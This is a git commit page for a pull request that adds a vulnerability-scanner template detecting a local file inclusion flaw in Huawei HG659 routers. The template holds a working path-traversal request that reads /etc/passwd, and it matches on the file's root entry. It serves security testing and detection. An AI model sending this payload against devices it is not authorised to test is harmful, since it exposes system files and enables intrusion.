Merge pull request #1774 from pikpikcu/patch-185

Create huawei-hg659-lfi.yaml
patch-1
Sandeep Singh 2021-06-28 21:46:51 +05:30 committed by GitHub
commit 039a41e790
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 26 additions and 0 deletions

View File

@ -0,0 +1,26 @@
id: huawei-hg659-lfi
info:
name: HUAWEI HG659 LFI
author: pikpikcu
severity: high
reference: |
- https://twitter.com/sec715/status/1406782172443287559
tags: lfi,huawei
requests:
- method: GET
path:
- "{{BaseURL}}/lib///....//....//....//....//....//....//....//....//etc//passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
condition: and
- type: status
status:
- 200